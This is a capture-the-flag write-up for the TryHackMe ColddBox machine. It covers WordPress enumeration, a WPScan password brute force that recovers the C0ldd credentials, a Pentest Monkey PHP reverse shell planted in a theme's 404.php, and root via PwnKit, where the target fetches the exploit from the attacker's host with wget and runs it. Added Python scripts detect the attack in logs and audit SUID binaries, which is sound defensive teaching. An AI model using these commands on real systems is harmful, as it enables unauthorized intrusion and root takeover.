ColddBox - TryHackMe Write-Up
Description: An easy level machine with multiple ways to escalate privileges. By Hixec. This TryHackMe machine focuses on Linux privilege escalation and CMS (Content Management System) exploitation, including WordPress vulnerabilities, making it ideal for ethical hacking and penetration testing practice.
STEP 1: Enumeration
To begin the assessment, we start by executing a nmap scan to identify open ports on the target system.
nmap -v -sSV -Pn -p- 10.10.147.34 -T 5 --open
Below is the result of the Nmap scan.
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
4512/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We accessed the website running on port 80.
We immediately started a directory brute-force scan using the Gobuster tool.
gobuster dir -u http://10.10.215.37/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
Reference: gobuster | Kali Linux Tools
There we discovered a "/hidden" directory containing the following message:
"C0ldd, you changed Hugo’s passwords, when you can, send it to him so he can continue uploading his articles. Phillp."
This gave us valuable information: Hugo's credentials were recently changed and are probably stored somewhere accessible, which may be useful for gaining further access.
From this message we were able to enumerate three valid usernames:
C0ldd
Hugo
Phillip
Additionally, the directory brute force attack uncovered the "/wp-admin" endpoint, indicating that the application is running a WordPress CMS.
With the confirmation that the application is running WordPress, we proceeded to use the WPScan tool to enumerate potential vulnerabilities.
wpscan --url http://10.10.147.34 --api-token <YOUR_API_TOKEN_WPSCAN>
Reference: wpscan | Kali Linux Tools
However, it did not identify any vulnerable plugins; the notable findings were an outdated WordPress core (4.1.31, flagged as insecure) and an enabled XML-RPC endpoint.
WordPress Security Scanner by the WPScan Team
Version 3.8.25
[+] URL: http://10.10.147.34/ [10.10.147.34]
[+] Started: Wed Nov 22 18:55:14 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.147.34/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://10.10.147.34/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.10.147.34/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.1.31 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://10.10.147.34/?feed=rss2, <generator>https://wordpress.org/?v=4.1.31</generator>
| - http://10.10.147.34/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.1.31</generator>
STEP 2: Exploitation
Since we had already enumerated three valid users in the application, we could use them for a brute-force attack to check if any of them had weak passwords.
Contents of names.txt:
C0ldd
Hugo
Phillip
WPScan command:
wpscan --url http://10.10.147.34 -P rockyou.txt -U names.txt
Reference: 100SECURITY
With this, we were able to confirm that the user "C0ldd" has a weak password.
[!] Valid Combinations Found:
Username: C0ldd, Password: 9876543210
We successfully logged into the user's account.
STEP 3: Remote Code Execution
The next objective was to gain remote access to the server. The simplest method involved creating a PHP page containing the reverse shell script from Pentest Monkey and triggering it via the browser.
I replaced the 404.php template of the site's Twenty Fifteen theme with this reverse shell script, so that requesting the template directly executes it and initiates the reverse shell connection.
Note: In the Pentest Monkey PHP reverse shell script, make sure to update the following variables with your actual listener information before deployment:
$ip = '127.0.0.1'; // CHANGE THIS
$port = 1234; // CHANGE THIS
Pentest Monkey Reverse Shell: GitHub - pentestmonkey/php-reverse-shell
After saving the changes, start netcat (nc) listening on the configured port, then open the 404.php page in the browser to gain remote access to the server.
# Your machine
nc -lnvp <YOUR_LISTENING_PORT>
# In the Browser
http://10.10.215.37/wp-content/themes/twentyfifteen/404.php
This approach allowed us to gain initial access to the server using a non-privileged user account, www-data, which is typically the default user for web server processes. To improve the usability and interactivity of the shell, we upgraded it by spawning a fully interactive TTY shell with the command:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Reference: Upgrade no shell reverso - Hacking na Web
This upgrade provides better terminal features such as job control, command history, and proper signal handling, making further post-exploitation activities easier and more stable.
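The web-side activity in Steps 1 to 3 (the Gobuster directory brute force, the WPScan password attack against wp-login.php, and the direct request for the theme's 404.php template) all leave traces in the Apache access log. The following detection script is an added example, not part of the original write-up; the log lines are constructed and the thresholds are assumptions to be tuned per site.

```python
import re
from collections import Counter, defaultdict

# Apache common log format: client, timestamp, request line, status, size.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+')
# Direct requests for a theme's PHP template are rare in normal browsing; after the 404.php swap they trigger the shell.
THEME_PHP_RE = re.compile(r'^/wp-content/themes/[^/]+/\w+\.php$')
# Thresholds are assumptions for this example; tune them to the site's real traffic.
BRUTE_404_THRESHOLD = 20
LOGIN_POST_THRESHOLD = 10

def parse(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def analyse(lines):
    """Map each client IP to the suspicious behaviours seen from it."""
    not_found, login_posts, theme_hits = Counter(), Counter(), defaultdict(set)
    for rec in filter(None, map(parse, lines)):
        ip, path = rec['ip'], rec['path'].split('?', 1)[0]
        if rec['status'] == '404':                      # directory brute force leaves many 404s
            not_found[ip] += 1
        if path == '/wp-login.php' and rec['method'] == 'POST':
            login_posts[ip] += 1                        # password brute force against the login form
        if THEME_PHP_RE.match(path):
            theme_hits[ip].add(path)
    findings = defaultdict(list)
    for ip, n in not_found.items():
        if n >= BRUTE_404_THRESHOLD:
            findings[ip].append(f'directory brute force: {n} 404 responses')
    for ip, n in login_posts.items():
        if n >= LOGIN_POST_THRESHOLD:
            findings[ip].append(f'wp-login.php brute force: {n} POST requests')
    for ip, paths in theme_hits.items():
        findings[ip].append('direct theme template request: ' + ', '.join(sorted(paths)))
    return dict(findings)

# Constructed sample: 25 dirbust misses, 12 login POSTs and one template hit from one client, plus a benign RSS fetch.
SAMPLE_LOG = (
    [f'10.0.0.5 - - [22/Nov/2023:18:55:{i:02d} +0000] "GET /dir{i} HTTP/1.1" 404 209' for i in range(25)]
    + [f'10.0.0.5 - - [22/Nov/2023:19:01:{i:02d} +0000] "POST /wp-login.php HTTP/1.1" 200 3421' for i in range(12)]
    + ['10.0.0.5 - - [22/Nov/2023:19:10:01 +0000] "GET /wp-content/themes/twentyfifteen/404.php HTTP/1.1" 200 0',
       '10.0.0.9 - - [22/Nov/2023:19:10:05 +0000] "GET /?feed=rss2 HTTP/1.1" 200 1532']
)

if __name__ == '__main__':
    for ip, hits in analyse(SAMPLE_LOG).items():
        print(ip, hits)
```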
STEP 4: Vertical Privilege Escalation
To escalate privileges, I searched for executables with the SUID permission set. These binaries run with the privileges of their owner (root, for root-owned binaries) rather than those of the user who invokes them.
I used the following command to identify such files across the system:
find / -perm -u=s -type f 2>/dev/null
Reference: SUID/SGID Shared Object Injection | Linux Privilege Escalation | by Aman Chauhan | Medium
Using this method, I discovered the presence of the pkexec binary, which is vulnerable to a known local privilege escalation flaw in Polkit, identified as CVE-2021-4034 (also known as PwnKit).
This vulnerability allows an unprivileged local user to gain root access by exploiting the way pkexec handles its command-line arguments and environment variables. It affects a wide range of Linux distributions and is particularly dangerous because exploitation is reliable and easy.
To exploit the pkexec vulnerability (CVE-2021-4034), I cloned a public PoC from GitHub to my local machine and hosted it using a simple Python HTTP server. On the compromised host, I downloaded the exploit script to the /tmp directory using wget, set the execute permission, and ran it, successfully obtaining root access.
Pkexec Exploit: GitHub - NxPnch/pkexec-exploit
# On my local machine
git clone https://github.com/NxPnch/pkexec-exploit.git
cd pkexec-exploit
mv CVE-2021-4034.py pkexec.py
python -m http.server 80
# On the remote machine
cd /tmp
wget http://<YOUR_IP>/pkexec.py
chmod +x pkexec.py
./pkexec.py
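From the defender's side, the SUID search above and the PwnKit finding suggest two routine checks: diffing the system's setuid binaries against a recorded baseline, and confirming that pkexec is patched or has had its setuid bit removed (chmod 0755 /usr/bin/pkexec was the interim mitigation distributions published). The script below is an added example, not code from the write-up; the KNOWN_RISKY set and the temporary demo tree are constructed for illustration.

```python
import os
import stat
import tempfile

# Names whose setuid bit is a known escalation vector; pkexec is listed because of
# CVE-2021-4034 (PwnKit). The set is an assumption for this example, not an official baseline.
KNOWN_RISKY = {'pkexec'}

def find_suid(root='/'):
    """Regular files below root with the setuid bit (same test as find / -perm -u=s -type f)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                mode = os.lstat(path).st_mode
            except OSError:                 # unreadable entries are skipped, like 2>/dev/null
                continue
            if stat.S_ISREG(mode) and mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)

def audit(root='/', baseline=()):
    """Diff the current setuid set against a recorded baseline and flag risky names."""
    current, known = set(find_suid(root)), set(baseline)
    return {
        'new': sorted(current - known),          # appeared since the baseline was taken
        'missing': sorted(known - current),      # removed since then (e.g. after hardening)
        'risky': sorted(p for p in current if os.path.basename(p) in KNOWN_RISKY),
    }

def pkexec_mitigated(path='/usr/bin/pkexec'):
    """True when pkexec is absent or no longer setuid (the interim PwnKit mitigation)."""
    try:
        return not (os.stat(path).st_mode & stat.S_ISUID)
    except FileNotFoundError:
        return True

def make_demo_tree():
    """Constructed fixture: a temp dir holding a setuid 'pkexec' and a plain 'ls'."""
    root = tempfile.mkdtemp(prefix='suid-demo-')
    for name, mode in (('pkexec', 0o4755), ('ls', 0o755)):
        path = os.path.join(root, name)
        with open(path, 'w') as fh:
            fh.write('#!/bin/sh\n')
        os.chmod(path, mode)
    return root

if __name__ == '__main__':
    demo = make_demo_tree()
    print(audit(demo, baseline=[os.path.join(demo, 'ls')]), pkexec_mitigated(os.path.join(demo, 'pkexec')))
```

Run it with no arguments to see the behaviour on the demo tree; on a real host call audit('/', baseline=<saved list>) and pkexec_mitigated() as a cron or configuration-management check.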
After successfully gaining root access, we were able to read both the user and root flags, completing the objective.
cat /home/c0ldd/user.txt
cat /root/root.txt